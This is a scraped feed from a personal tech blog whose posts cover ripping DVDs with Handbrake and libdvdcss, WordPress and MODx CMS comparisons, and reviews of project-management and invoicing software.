Software – Tech Tips, Reviews, Tutorials, Occasional Rants Fri, 21 Mar 2014 05:03:09 +0000 en-US hourly 1 How to Simply Rip DVDs in 64-bit Windows Sun, 08 Jul 2012 22:33:41 +0000 Continue reading How to Simply Rip DVDs in 64-bit Windows ]]> Handbrake iconIn the past, we’ve looked at how to easily rip DVDs on the Windows platform. That method still works great, unless you’re on a 64-bit version of Windows. For those of us now running Windows 7 64-bit, we have a problem: DVD43 – a required decrypter used in the previous tutorial, does not get along well with 64-bit versions of Windows.

The Solution – Handbrake with libdvdcss

There’s an easy solution to this problem, and it only requires the installation of one software program. I’ve migrated to the mighty Handbrake for all my DVD rips. First, install the 64-bit version of Handbrake. As of this writing, the latest version is 0.9.6.

With Handbrake installed, make a mental note of its installation location (probably C:\Program Files\Handbrake). Next, download the libdvdcss-2.dll file from Handbrake’s repository. Here’s a zipped copy of my working file (libdvdcss), just in case.

Take your copy of libdvdcss-2.dll and put it inside your Handbrake installation folder, as noted above. Finally, rename the file to libdvdcss.dll.

Handbrake folder with libdvdcss


Let’er Rip

You can now launch Handbrake and rip DVDs as usual. The full Handbrake guide is here, but one quick-and-dirty guide is to:

  • Choose your DVD from the Source button
  • Select your Title (you’re probably looking for the one with the longest duration – that’s the full video)
  • Pick a Destination for your ripped video file
  • Choose a Preset on the right side (I tend to stick with Regular – Normal)
  • Hit the big, green Start button, and let’er rip!
Handbrake - Main window
Handbrake – Click to enlarge

That should do it! You should now be able to decrypt and rip DVDs on Windows 7 64-bit. On a personal note, I’m impressed at how little time it takes to rip a full-length movie on modern hardware versus just a few years ago. I’m showing my age, but I fondly recall ripping DVDs using my beloved antique workhorse from 2001: an AMD 1600+ processor with 512 MB of DDR 133. Ripping a single DVD might have taken 8 hours or more! Today, it takes minutes. You kids today have no idea how lucky you are.

Okay, that’s enough nostalgia for this old timer. Get off my lawn, and I’ll get back to ripping my DVD collection. 🙂

How WordPress Destroyed the Internet Tue, 10 Jan 2012 07:38:15 +0000 WordPress is so popular that it is taking over — it’s behind 22% of all new sites on the internet, but this sets a dangerously poor coding standard. Our infrastructure is crumbling!

Yes, this is a rant. My beef today is this: the WordPress manager might be easy to use, but under the hood, it sucks. There, I said it. It’s awful architecture and it has taught thousands of web developers that it’s Ok to write piss-poor code. This has single-handedly dumbed-down a whole generation of developers by setting a bad example. WordPress is the junk food of coding standards: ubiquitous, tastes good, but lacking any nutritional value.

I’ve ranted about WordPress before but what put me over the top today was the Suffusion Theme. It looks like a clean layout, so I thought I’d give it a try. Holy flaming monkey balls, was I in for a shock!

Suffusion Theme Options
Holy Smokes: The Suffusion Theme is not just a Theme

This theme not only has a metric-crap-ton of options, it also does the unthinkable: it allows you to register custom post-types and custom taxonomies. Does that sound like something else? Why, yes, it does: THAT, my friends, is A PLUGIN. Now, no offense to the theme’s author — it’s a clean interface and he obviously takes a lot of pride in his work — but this type of thing should never occur. A theme should never introduce extra functionality. What happens when you change the theme? Your whole site could collapse.

The conclusions that I have to draw about about the architecture here are pretty negative: WordPress allows (or even encourages) the polluting of application layers in very unhealthy ways. It’s a very serious black mark for an application to allow a theme to get away with that. The view layer should be static: no logic, no functionality, it should merely determine how data is displayed.

This is hardly the end of the architectural infractions WordPress is guilty of, but it is perhaps one of the most obvious. I’d better leave it at that: the way WordPress is built allows for severe architectural flaws that make development difficult or impossible. Buyer beware.

Review of Web-based Project Management Software Sat, 31 Dec 2011 05:00:52 +0000 Help! I gotta keep track of everything I gotta do! There is help available to track your projects, you just got to know where to look.

A lot of developers, designers, students, and even web-hobbyists have a lot of items on their to-do lists for any particular site or project. You have to remember to fix that one CSS glitch, or rewrite a page to use some new function… the lists can be long and daunting. If you’re like me, you’re likely to forget half the stuff you need to do, and if it weren’t for project management software, I might as well stay in bed.

To put it mildly, there are *a lot* of applications out there that help you track bugs and manage projects, and this article only looks as a handful of them. Although the general purpose of these web-applications are similar, there are substantial differences in the pricing models, features, and usability, and hopefully this article will help you identify an application that is right for you. Or, if you’ve never really thought about using one before, maybe this article can help show you why project management / bug tracking software is good to have around.

This post only covers project management. I’ve discussed invoicing softare in another post. Some of these packages include time-tracking and invoicing, but that’s just a “nice-to-have” for the purposes of this article.

DISCLAIMER: I am not affiliated with any of these companies. None of the links in the article text are affiliate links; I don’t get a kickback or commission on referrals, I’m merely sharing my opinions and experiences using the software in the hopes that it’ll help inform the decisions of others.

Here’s the list… some of these are hosted solutions (software-as-service), and some you have to download and install.


Cheapest Option: Free

# Users: unlimited

Wiki?: yes

Notes: This suite of Apps seems like they were hoping to get purchased by Google Apps… kinda similar, but more labored somehow.

My Intervals

Cheapest Option: Free

# Users:4


Notes: You can get 1 project for free… but the functionality is limited.

Bit Bucket

Cheapest Option: Free

# Users: 5

Wiki?: yes

Notes: yet another solution…


Cheapest Option: Free

# Users: 2

Wiki?: Yes, called “Notebooks”

Notes: This is one of my favorites for hosted solutions. I recommend Unfuddle — it’s not a silver bullet, but Unfuddle is a great tool for maintaining sanity: clean, simple, and easy to use. If you pay a little bit, you can unlock the best features.

Code Spaces

Cheapest Option: $3.99/mo

# Users: 2

Wiki?: yes

Notes: I felt the manager here was heavy… sorta Windowsy in a bad way, as in the interface needs to lighten up, but did have a good set of features.

Feng Office (Formerly OpenGoo)

Cheapest Option: $59/mo

# Users: unlimited

Wiki?: yes

Notes: this is a popular solution for its thoroughness. — you have to install it on your servers, which is actually a good thing for people storing sensitive info.


Cheapest Option: Free

# Users: unlimited


Notes: This one you have to download and install on a server that runs PHP and MySQL — it includes features for sales teams. It’s built using the ATK framework.

Project Pier

Cheapest Option: Free

# Users: unlimited

Wiki?: yes

Notes: you gotta download and install this PHP/MySQL app. This is like the PHP cousin of Redmine, so if you don’t have the ability or resources to work with Ruby on Rails, this is a nice option.


Cheapest Option: Free

# Users: unlimited

Wiki?: Yes

Notes: This is a clean app — another one you have to download and install yourself. It’s a nice option (try the demo). The only thing I didn’t care for was that the app relies heavily on icons, so it’s hard to get your bearings. Good German engineering!


Cheapest Option: Free

# Users: Unlimited

Wiki?: Yes

Notes: This is my favorite. It’s not perfect, but it’s a clean interface and easy to navigate. The major downside is that you have to install this yourself. Can you install Ruby on Rails on your server? No? Then this might not be for you.


Cheapest Option: Free

# Users:unlimited, but only 1 project.

Wiki?: Yes

Notes: although this is hugely popular hosted solution and it’s well integrated with many software projects, this does not have a good ticketing system, and it does not tie into code versioning (e.g. SVN), so I don’t fully comprehend its popularity. It’s pretty good, but it seems over-hyped.


Cheapest Option: $25/mo

# Users: unlimited

Wiki?: yes

Notes: This integrates with their Kiln product to tightly integrate bug tracking with code revisions. There’s another product Trello that does visual project organization, but to be honest, I’m kinda confused by these interrelated projects.

Pivotal Tracker

Cheapest Option: $7/mo (free for non-profits)

# Users: 3

Wiki?: sorta

Notes: This is a serious app from the boys in Boulder for agile development — they’ve really thought through the way that large projects should be managed. It’s a hosted solution, but they can install it in on-site if needed.


Cheapest Option: Free (for open source), otherwise $15/mo

# Users: 10

Wiki?: yes

Notes: another clean app. This is a hosted solution.

Google Code

Cheapest Option: Free

# Users: unlimited

Wiki?: yes

Notes: This option is available ONLY for open-source projects. It’s clean, with an easy interface. Updating wiki pages and bugs seems to triggers errors not infrequently, but I recommend this for any open source project.


Cheapest Option: Free

# Users: unlimited

Wiki?: yes

Notes: A lot of projects use this (e.g. WordPress): You download and install it. It’s written in Python and can run on several common databases.


Cheapest Option: Free

# Users: unlimited

Wiki?: yes

Notes: It’s functional, but the UI/UX is pretty crusty. Sorry to poo-poo the hard work of the devs here, but I never felt like I could get clients to use this app… it’s a bit disjointed.


Cheapest Option: $10/mo

# Users: 10

Wiki?: Yes

Notes: This is popular with big corporations. The biggest disadvantage of this is that it’s HEAVY: you gotta have a rock-solid sysadmin to setup Tomcat on your server to install this behemoth.


Cheapest Option: Free

# Users: unlimited

Wiki?: no

Notes: this is a powerful Perl application used by Firefox that can be the public face of your app. You have to download and install this.


Cheapest Option: Free

# Users: unlimited

Wiki?: Yes

Notes: this thing is on fire — GitHub is THE thing right now. It’s wiki is a pain in the ass compared to Google Code when it comes to formatting special characters. Paid plans get private repos.

Hopefully that’s a good list to help you narrow down your choices. If that’s not good enough for you, check out Wikipedia’s comparison of issue tracking systems

]]> 4
MODx vs. WordPress (revisited) Sun, 25 Sep 2011 20:25:00 +0000 last article I wrote about this topic was criticized as being heavy-handed in my complaints about WordPress, so in this article, I am revisiting the topic from the other side of the fence. There are things about WordPress that are great, and there can many good reasons why you'd choose it as your Content Management System.]]> The last article I wrote about this topic was criticized as being heavy-handed in my complaints about WordPress, so in this article, I am revisiting the topic from the other side of the fence. There are things about WordPress that are great, and there can many good reasons why you’d choose it as your Content Management System.

Ease of Updating

WordPress has done a fantastic job of making its product easy to use: each time there is a new version of WordPress, it takes only the click of a button to update your site. MODx still requires an FTP connection and an FTP client that can merge directories, otherwise, the upgrade can be hairy indeed. Unless you’ve got a really nice FTP client like Coda or you’ve got SSH access and you’re comfortable using cp -fr, then MODx can’t compete… MODx-ers will have to wait until version 2.2 or 2.3 when MODx will offer seamless upgrades.

WordPress also lets you easily upgrade all your plugins with a single click. MODx Revolution introduced package management, so you can see which plugins need updating, but it’s still not as streamlined as what WordPress offers.


Although WordPress at times is boneheaded and backwards in how its code is built, it is almost always extendible. MODx, especially Revolution, represents some code that is much more mature. If you are a PHP hobbyist or even a junior level developer, there’s a good chance that you won’t be able to follow the core MODx code because it’s so much more complex. MODx has areas that simply are not easily customizable — for example, the MODx manager is just flat-out hard to programmatically modify. At best, customizations of the MODx manager can be accomplished via configuration, but customizations via plugins can be complicated, and at worst, they may not be impossible. The WordPress manager, by comparison, is nearly always customizable via one event or another, so with a working understanding of PHP, you can usually trick things out to how you want them. WordPress may be completely low-brow in how it implements certain functionality, but as long as you can find an appropriate action or filter to hook into, you can usually customize the dashboard to how you want it.

Some of the more-experienced readers might be raising an eyebrow here as I compare MODx and WordPress in this area, because the MODx architecture is built so much more sensibly and because MODx is entirely object-oriented, it is by definition easier to override behaviors. But my point is that for “Joe Coder”, there are many tweaks that are simply easier to carry out in WordPress. It’s a bit like having a Volkswagon and a Jaguar in your garage: you can carry out most repairs on the VW with a wrench and a screwdriver whereas the Jaguar requires special tools, experience, and patience.


WordPress’ manager is built using jQuery. The MODx Revo manager is built using Ext JS. Although Ext JS offers way more options when it comes to building an application, the experience of using the MODx manager is that it is sluggish and more difficult to customize due to the steeper learning curve. The WordPress manager may not represent the most mature architectural principles, and jQuery may be simplistic for certain uses, but WordPress is generally much faster to use — jQuery has a much lighter footprint so it loads more quickly and doesn’t require as many resources from your server.

Secondly, jQuery, like WordPress itself, is much more widely used than Ext JS. There are lots of jQuery plugins available and it’s generally easier to customize. No, jQuery isn’t going to be the end-all-be-all of your web application, and it isn’t going to scale well when you start demanding more and more complex user-interfaces, but it really fits the bill for a huge number of sites and interfaces.

Post Types

Any good content management system has to be able to store different types of content. In general, MODx is far better at this from an architectural and from a templating standpoint, but from the viewpoint of the average manager- or editor-user, WordPress generally makes more sense. MODx lets you define custom fields (called Template Variables in MODx parlance), and you associate them with a template. It makes good sense architecturally, but it is a bit… weird.

For example, you may create a “Book” template with custom fields for “Title”, “Author”, and “ISBN”. So the work flow in MODx is that you add a generically-named Document, then once you select the “Book” template, the “Title”, “Author”, “ISBN” custom fields appear, suddenly making the document a “Book” document. That works, but many users just don’t get it: they want to add a Book to their site. WordPress 3 allows for post types, which accomplishes just that — the built-in implementation is very primitive in comparison to MODx, but once it’s up and running, you won’t need to lecture your users about how a “Document will become a Book once you change the template”. If that explanation is confusing to you, then you can appreciate why WordPress’ implementation of this concept is easier to work with as an end-user. The Custom Content Type Manager plugin fixes many of these WordPress warts.


Hopefully this article explains a bit more of WordPress’ strengths: it’s not the best solution for every project, but it can be the right choice for a lot of projects. I still have a long list of gripes about WordPress, but that doesn’t mean it doesn’t have its strengths.

]]> 2
Comparing Online Invoice Software Fri, 22 Apr 2011 14:06:27 +0000 Following up on an article I wrote a couple years ago on Free Online Invoice Software, I wanted to write a blurb about paid online billing software. My business has grown, and I was spending more and more time dealing with invoices. So it was time for me to actually pay for the software that pays me. Seems kinda silly doesn’t it? I was so uptight about spending money on software that actually pays me. So I spent a few hours with each of the programs below, and well… you can read about what I found.

  $$$/mo Users Clients Projects Invoices
FreshBooks $19.95/mo 1 (you), additional logins (e.g. for accountant) @ $10/mo (clients can optinally be granted viewing privileges) 25 ??? Unlimited
Harvest $12/mo 1 (you), additional logins (e.g. for accountant) @ $10/mo Unlimited Unlimited Unlimited
Invoicera $9.95/mo 1 (you), plus 2 additional logins 25 25 Unlimited
QuickBooks $12.95/mo 1 (you) + your accountant Unlimited (?) Unlimited (?) Unlimited (?)

* Sources: 1, 2, 3, 4


Freshbooks offers a very clean interface that made a lot of sense to me right off the bat. It was easy to add clients and recurring monthly expenses (holy %!**! I didn’t realize how much I was spending on server hosting!). It integrates right into my PayPal account, so when a client pays an invoice, POOF, that invoice automatically updates and marks itself as paid. I used to have to do that manually with BillingManager.

FressBooks Menu
FressBooks Menu

The price was a bit high for what I got, so I’m sorta waffling on that, but what really sold me on FreshBooks was the nice desktop timetracking software, ChronoMate. It’s $1/month more to use it, but I can clock stuff while working offline, then it syncs directly with my FreshBooks account, so I know (and my clients know) exactly how much time I’ve spent working on a project. Throw me a bone (affiliate link)

Harvest Invoices
Harvest Invoices

Harvest is a solid application, and they are actively developing improvements. The menu organization here was also very similar to FreshBooks and Invoicera.

Harvest Menu
Harvest Menu

I have nothing but good things to say about Harvest: this is really a well-crafted application, and its pricing and features offer a superb value: unlimited Clients, Projects, and Invoices for all plans. They offer some really nice integrated time-tracking features, so I’m eyeing this very seriously: the ChronoMate integration with FreshBooks is pretty good, but it has some shortcomings that Harvest doesn’t have. I have to give a big tip of my hat to Matthew Lettini (one of? their Designer) for his detailed responses to my questions. Harvest gets massive bonus points for its commitment to good communication and taking their customers seriously, so if you want to work with a company that works with you, I don’t think you could ask for more.


Invoicera also offered a really nice application. It too offered a very similar set of menu options, and it was very easy to navigate. I can’t think of anything wrong with this software.

Invoicera Menu
Invoicera Menu

It was easy to set up invoices, both one-offs and recurring. The expense management was a little bit confusing to me, but I got the sense that with a little bit more time spent using the software, it’d become really clear — they too were responsive to my questions about the software. The user interface was somewhere between Harvest’s and Freshbooks.

Probably the biggest draw here is what you get for the price: you and 2 additional users (e.g. your accountants) get logins for free with the default package. You have to pay for that with the other systems.


Originally I thought I would end up going with QuickBooks because I was already using its little brother: BillingManager. Wow… that was a bad assumption. All the simplicity and ease of use that was present in BillingManager was completely gone in QuickBooks… gone as in “scorched earth, salted ground.” The supposedly “automatic” transfer of data from BillingManager to QuickBooks was completely botched: half of my data from 2 years ago made it over, the rest… who knows. And nobody over there seemed to know what was going on. BillingManager was sort of treated like Intuit’s bastard child that nobody knew what to do with. It would have saved me time if they could have just deleted the partial data.

QuickBooks Menu
QuickBooks Menu

If you look at the menu closely, you can see that it’s WAY more complicated: QuickBooks offers features not offered by its competitors, but the price you pay is dealing with a wonky application and befuddled responses from the support hotline. To boot, most of the features that might justify this complexity (e.g. time tracking, integrations with online banking and credit card statements, and bill management) comes only with the beefier packages starting at $24.95/month.

The biggest waste of time with QuickBooks is that they offer NO email support and NO public ticketing system of any kind (one of their pages says they offer email support, but their support staff said they didn’t, so who knows what’s going on there… they don’t even know it seems). Compare the time it takes you to fire off a 2 line email identifying your problem with the software to the time it takes to wait in the call queue and finally get transferred to someone who might know what you’re talking about. That’s lost money right there: your time, wasted. It made it worse that I’m living abroad while trying to set this up, so figuring out the time differences of when I could call them, and then paying international calling fees to wait in their call queue is just poor. I wouldn’t recommend using QuickBooks unless your accountant demands it.


This was really close: pretty much a three-way tie in many ways between FreshBooks, Harvest, and Invoicera. Look at their menus: they are all very similarly structured. Honestly, I think that Freshbooks, Harvest, and Invoicera are all great products, and I would have been happy using any of them. QuickBooks is the only one that annoyed the piss out of me: having a site that runs on pop-ups and forcing all their support requests to take place over the phone were just nails in their coffin. QuickBooks may be the “industry leader”, but I think they’re ripe for unseating because their site and their software were just painful to deal with. I wouldn’t be surprised to see a comment on this post asking me to “please give us a call to discuss”, but meh… I’ve spent too much time on the phone with them already.

]]> 8
WordPress vs. MODx Tue, 19 Apr 2011 17:04:56 +0000 There are a lot of Content Management Systems (CMS’s) out there, so I wanted to give a blow-by-blow analysis comparing two of them: MODx and WordPress. I feel oddly qualified to do so: Brian and I just authored a book on WordPress plugin plugin development (WordPress 3 Plugin Development), and I am a MODx Solution Partner who was invited to speak at the MODxpo conference in Dallas last year. I’ve used both flavors of MODx (Evolution and Revolution) and WordPress while building somewhere around 50 web sites over the past couple years, and I like both systems. I have even contributed a couple plugins for both systems (e.g. Custom Content Type Manager for WordPress). So after the urging of some friends and colleagues (like Kris), I’m organizing my techno-ramblings into a coherent article.

I’m going to walk through a series of areas and compare and contrast both how both CMSs work in those areas. The comments here apply to WordPress 3.x and (mostly) to MODx Revolution, but MODx Evolution is mentioned where appropriate.

Basic Stuff

System Requirements

WordPress 3.1 MODx Revolution
Server OS ???
  • Linux x86, x86-64
  • Windows XP
  • Mac OS X
Web Server
  • Apache ???
  • NGINX ???
  • Apache 1.3.x or Apache 2.2.x
  • IIS 6.0+
  • Zeus
  • lighthttpd
  • Cherokee
  • MySQL 4.1.20 or higher (5.0+ recommended)
  • MyISAM table types
  • MySQL 4.1.20 or higher (excludes 5.0.51)
  • Default table encoding of UTF-8
  • InnoDB and MyISAM table types
PHP Version 4.3+ (5.2+ recommended) 5.1.1+ (excluding 5.1.6/5.2.0)

  • Running as FastCGI
  • safe_mode off
  • register_globals off
  • magic_quotes_gpc off
  • PHP memory_limit 24MB or more

PHP Modules ???
  • zlib
  • JSON
  • cURL
  • ImageMagick
  • GD lib
  • PDO, with database driver
  • SimpleXML

*Source: WordPress requirements, MODx requirements

If the requirements for MODx Revo look insanely detailed, ask yourself this: “do you really want to be guessing whether or not your server will support a given app?” MODx Revo does a pretty good job of testing for the necessary requirements during installation, so you don’t have any unexpected surprises.


WordPress offers its “famous” 5-minute install, and I give them credit where credit is due: WordPress is a simple web app to install, but to be fair, installing MODx Evolution is also very straightforward.

MODx Revolution has beefier requirements, and it’s far more likely you’ll run into troubles setting up your webserver permissions or PHP extensions (e.g. PDO). Moving a Revolution install to a new server is also a tricky operation that requires some patience (see this how-to).


In short, WordPress and MODx Evolution are easily installed on practically any web server that supports PHP and MySQL. MODx Revo takes longer to install and configure and it requires a beefier server.


Hands down, MODx offers the gold standard in templating. Expression Engine is a healthy second place, but only in my days of doing Perl development with the venerable Template Toolkit did I encounter a templating system that followed good MVC architectural principles as well as MODx.

What does that mean? It means that if you’re a front-end designer who likes to roll your own HTML and CSS, then MODx will grant you total freedom to implement the designs you want, whereas WordPress may result in headaches and holes punched in your walls (no comment on the convoluted mess that is Drupal and Joomla templates). I’ve posted previously about creating templates in MODx Evolution and how to import existing layouts into MODx Evolution, and the process in MODx Revolution is nearly identical (the only difference is the format of the placeholders).

In MODx, you can easily have multiple templates (i.e. layouts), and use any one of them for any page. In WordPress, the ability to use a specific template is possible only with pages, not posts. The thing that really gives me convulsions is understanding how WordPress formats its special pages, e.g. a category page, or an author page. See the image below as a reference for how WordPress formats page requests.

WordPress Template Hierarchy
WordPress Template Hierarchy

See the official WordPress docs for Template Hierarchy for more information. I honestly have a hard time fathoming that this is the solution that actually got implemented… what other crazy ideas were on the drawing board?


If having a specific HTML/CSS layout for your site is more than a “nice-to-have”, then MODx will save you many hours; the time to rework layouts in WordPress can be considerable and some of the PHP hacks are not trivial, whereas MODx templates are easy to create, modify, and maintain.


MODx offers nearly infinite menu flexibility through use of menu-generating PHP Snippets, primarily WayFinder, but it’s not aimed at the average user. WordPress has a built-in GUI for creating menus, but I have experienced some bugs with it when using custom content types. Your WordPress theme may not support more than one or two menus, so in the end you may end up writing some code in your tmeplates (e.g. using my Summarize Posts plugin) so you can list the posts that you want to see.

In a nutshell, WordPress offers an easy GUI, but if you need more customization MODx’s flexibility here is far greater.


WordPress has a huge number of user-contributed plugins available, whereas MODx has relatively few. The sheer number is not a good comparison, however; I downloaded and tested hundreds of plugins in the process of writing my WordPress book, and the number of plugins that are unusable due to sophmoric errors or plain-old bad coding is huge. I estimate that at least half of the plugins in the WordPress repository are unusable, and perhaps only a tenth of them are worth using. There are crufty plugins in the MODx repo to be sure, but the playing field is more even than you might think.

The real difference here comes when you have to write your own code: MODx is a lot easier to work with with a shorter learning curve for a majority of code, whereas learning the ropes of WordPress plugins requires more guidance (hey, did I mention we wrote a book about that?).


This is an area that is hard to discuss unless you’re a geek, but in a word, MODx offers a robust and well-architected MVC framework under the hood that can make writing custom plugins (Snippets, manager pages, et al) a breeze. The work done by Jason Coward and Shaun McCormick is really astounding.

Some of the limitations to WordPress are really staggering: it is basically a stateless application, so by default it does not use sessions, and nearly all of its API functions exist as procedural functions in the main namespace, so naming collisions are a big concern when authoring plugins. This makes certain functionality damn near impossible in WordPress. For example, creating a WordPress application with a login portal and access to custom data models would require an enormous amount of time. Even accessing WordPress’s posts and categories is difficult at times; I basically had to rewrite core WordPress functionality with another plugin (Summarize Posts) just to get the menus and summaries I needed for one recent site.

Another severe limitation is WordPress is that all extensions to the core occur via plugins that are triggered by system events (confusingly they are loosely categorized into “actions” and “filters”). This construct can be awkward at times, and the WordPress architecture is showing its age as the number of events exponentially increases, whereas the amount of documentation for them continually wanes. Realistically you can get WordPress plugins to do just about everything you need using only a handful of events, but debugging someone else’s plugins is a nightmare: there is no centralized location listing which events are being hooked into, and new events are often created and executed on the fly. Debugging WordPress plugins is like Alice’s trip down the rabbit hole: majorly trippy,and you don’t know if you’ll ever come out.

User management is another area where MODx dwarfs WordPress: Revolution can handle totally granular control of permissions, but it is admittedly overly complex for 90%+ of use cases. Evolution offers a much more sensible permissions scheme that covers most use cases.

MODx offers much more sensible implementations of custom code: like WordPress it uses event-driven plugins, but it also uses custom PHP snippets which can be placed anywhere on a page or in a template.

Another impressive feat is how MODx Revolution has abstracted the database into a separate coding layer — that means it is relatively easy to interface with custom database tables (or even to other database engines) using code that is completely database agnostic (support for SQLite and PostGREs is in the works). That’s some seriously geeky stuff that has kept me awake at night trying to comprehend how they accomplished that. MicroSoft has even worked directly with the MODx team because MODx’s architecture is flexible enough that it can run on an all MicroSoft stack (i.e. IIS and MS-SQL). I can’t think of a single other system that switch-hits as well as MODx.


If the site you are building is more of a web application that requires a lot of custom coding, go with MODx; the level of maturity in the underlying MODx framework is light years ahead of WordPress, but be advised that the coding in MODx is sometimes so advanced, it takes a very senior developer to understand what’s going on. If you decide to do a more serious application-type-project in WordPress, be sure to allocate extra time to augment or rewrite the core code. If you’re doing basic extensions or variations of a simple site/blog, then WordPress plugins can do that pretty well, so don’t overcomplicate things.


WordPress offers a clean manager dashboard for its administrators which relies on the jQuery JavaScript library to provide AJAX functionality and smooth user experience. It’s pretty easy to find your way around.

WordPress Manager dashboard
WordPress Manager dashboard

MODx underwent a huge change in its manager dashboard between Evolution and Revolution, and the Revolution dashboard is overwhelming for many. Evolution’s dashboard is cleaner and snappier.

MODx Evolution Dashboard
MODx Evolution Dashboard

MODx Revolution’s manager dashboard is still being optimized. It’s based on ExtJS. For those of you not familiar with ExtJS, it was based on YUI (the Yahoo User Interface library), and it offers some fatastically powerful features for building interfaces for web applications. My only complaint with it is that it’s heavy: the MODx Revo dashboard can take a long time to load, and sometimes clicking on buttons and links feels unresponsive.

MODx Revo dashboard
MODx Revo dashboard


Do not make your decision about which system to use based on the dashboard alone — that’s like marrying a girl for how big her tits are. I know some clients who have loved and hated the dashboards in both systems. Again, MODx offers more flexibility if you want to change the dashboard behavior. The big difference here is simple: WordPress gives you a super clean view of your posts based on time whereas MODx gives you a hierarchical view of your posts.


Everybody wants a blog, just like everybody wants a shiny new car. Authoring blogs has been a core competency of WordPress, and they get massive props for making them very simple to setup: out of the box, you can get a blog up and running with integrated tags and categories and comments within minutes. It’s really what WordPress is all about: blogging. WordPress even has some nice security features in place with its Akismet spam filter.

Contrary to some of the on-line murmurings out there, both versions of MODx can run blogs, but until MODX 2.2, the process to set them up was painfully laborious in comparison. The Articles extra for MODX gives you a quick and easy blog — it can even import your posts from WordPress, so the gap between the two systems is closing quickly. The only thing it doesn’t do as well as WordPress right out of the box is its taxonomies (tags and categories): you still have to do some configuration to get those configured how you want them, but as the docs say:

“MODx Revolution is not blogging software, but rather a full-blown Content Application Platform, it doesn’t come pre-packaged with a cookie-cutter blogging solution.” 


If your priority is to get a blog up and running as quickly as possible, and you have few requirements for supporting any other content, then WordPress is the way to go. Starting with MODX 2.2, however, you can use its “Articles” extra, which gives you simple blogging functionality, with many of the features available to WordPress.

Custom Content (CMS functionality)

If blogging is where WordPress shines, then CMS functionality is where MODx clearly has the upper hand. WordPress does support custom fields for its posts and pages, and in version 3.x, they support additional “post types”, so finally WordPress is getting some traction as a CMS, but it’s still a bit of a toy in comparison to MODx.

One of the biggest problems with WordPress as a CMS is its lack of support for sensible custom fields: for each post or page, you have to manually add the same custom fields over and over again, and by default, the custom fields are always simple text fields. I have attempted to rectify this in my Custom Content Type Manager plugin, and my plugin does a lot to give WordPress CMS capabilities, but it still represents a series of awkward workarounds that stretches the WordPress core nearly to its breaking point.

One related area here is how MODx can manage and serve static files via what MODx calls “Static Resources”. This is a great way to enforce permissions on viewing, streaming, or downloading static files (e.g. PDFs or Flash movies). WordPress just flat out can’t do that.

Although MODx offers greater flexibility, WordPress’ integration is a bit cleaner for the manager user (it’s a holy pain in the ass for the developer, but if you download my plugin you should avoid this unpleasantness). When WordPress registers a new “post type”, you get a nice menu icon in your dashboard and it’s really clear to the manager that he/she is adding a new post, page, or movie (etc). For example, if you want to add a movie post, you’d click on “Add Movie”. It’s really quite logical. In MODx, this same type of distinction occurs at the template level. Architecturally, this makes sense, but it’s confusing for the manager user, because it may not be at all clear that they need to add a “normal” page (i.e. resource), and then choose to use the “movie” template. I’m planning a MODx plugin to help rectify this UI “wart”.

A custom post type in WordPress
A custom post type in WordPress


If you have to display multiple types of content on your site (e.g. an eCommerce site), then MODx offers far greater flexibility, but it does take longer to configure. If your CMS requirements are simple and you don’t need to worry too much about customizations, then WordPress can do that very well and very quickly.


SEO is the an cyclical buzz, and at the moment, a lot of SEO guys are hailing WordPress as the holy grail of search-word wad-shooting. To be blunt, I think SEO is largely an over-hyped crock of crap. If you build a well-structured site with good content, your pages will show up in search results: if there is a site out there with awesome content that is not showing up in relevant search results, I have yet to see it. Search engine optimization is often a pseudo-science practiced by get-rich-quick marketeers who are convinced that they can turn lead into gold by over-hyping a site with various gimmicks. 90% or more of SEO should have to do with creating good content, and perhaps the last 10% of your efforts should go into polishing your site. It can be used to improve search results, but it tends to fail when you try to make search results come out of thin air. Too often I have seen companies do this the wrong way around: they spend 90% of their time publicizing a site that is a vapid cesspool instead of spending their time making a site that’s worth visiting. At best, SEO techniques are constantly changing as Google updates and refines their indexing algorithms. If you optimize your site today and Google farts tomorrow, all of your work may be for naught. Do your due dilligence, but it’s just not worth spending inordinate amounts of time tring to beat Google at their own game.

Rants aside, both systems offer ample ways to do search engine optimization. Assuming that you have good content, the rest of the process boils down to having well structured HTML (which relies on a solid templating system), and the ability to effectively index your pages. WordPress offers built-in taxonomies (categories and tags) for flagging your posts, and MODx can be set up to do this rather easily by using an Auto-Tag custom field (a.k.a. a MODx “Template Variable”).

MODx offers a much more flexible system for generating URLs (basically you can use any URL you want for any page). WordPress does offer flexibility here, except for its special pages (e.g. category listings or author pages).


Comparing SEO features between MODx and WordPress is a moot point: both systems allow you to adequately structure your content and your site.


No system is 100% secure. MODx has had relatively few serious exploits; WordPress has had many, no doubt due in part to its popularity. For what it’s worth, I have had WordPress and MODx Evolution sites hacked, but not yet a Revolution site. It’s hard to quantify how secure an application is… I’d love to see the detailed forensic results of a penetration test against default installations of both CMS’s. In general though, the WordPress architecture is primitive and more ripe for being hacked: it’s more difficult to lock down spaghetti code. WordPress also offers many more plugins, and the plugin authors tend to be less experienced, so their code is more likely to have security holes.

There are many fingerprinting utilities out there that will attempt to locate known weaknesses in plugins, and WordPress is more easily fingerprinted; MODx Revo allows you to change default locations for the MODx manager or to even remove it from public view altogether. There are some discussions in the MODx Forums about how to harden MODx, but I haven’t yet seen a detailed how-to on how to eliminate the most common attack vectors. There are also good posts out there for hardening WordPress.

I reported a nasty vulnerability in phpThumb that affected MODx and numerous other CMS’s (phpThumb is a popular image manipulation library), but the MODx Revo architecture prevented the exploit from succeeding on Revo (good job to Shaun and Jason for architecting the connectors in the way they did).


I feel that MODx Revolution is probably more secure, but there are no guarantees when it comes to security. No system is bulletproof, so you best have redundant backups on hand and follow the recommendations of Basic Web Security no matter which system you’re on.


This is another area that is pretty black and white in my opinion: WordPress support sucks. Although WordPress is more popular if you look at the numbers, you wouldn’t know it if you post questions in the WordPress Forums. I have rarely gotten any useful answers (if I got answers at all): anything beyond simple inquiries tend to go unanswered, leaving me alone in the dark reverse-engineering damn near everything.

My other gripe with WordPres is their weird distinction between and You can host your blog at, and then you get more support, but it is effectively software as service: you can’t upload plugins and you can’t modify code, so the interface suddenly becomes a bit like BlogSpot.

By contrast, the MODx Forums are full of helpful people. It’s a great place to be: it’s not uncommon to get responses from the core team on almost any level of inquiry, from trivial to cerebral meltdowns. There are some superstar participants, such as Susan Ottwell and Bob Ray, who have both contributed immensely helpful posts and tutorials on how to use MODx. MODx also offers commercial support; it’s still in its infancy, but for a yearly fee, you can get access to a kind of “MODx hotline” and get help resolving MODx issues on your sites.


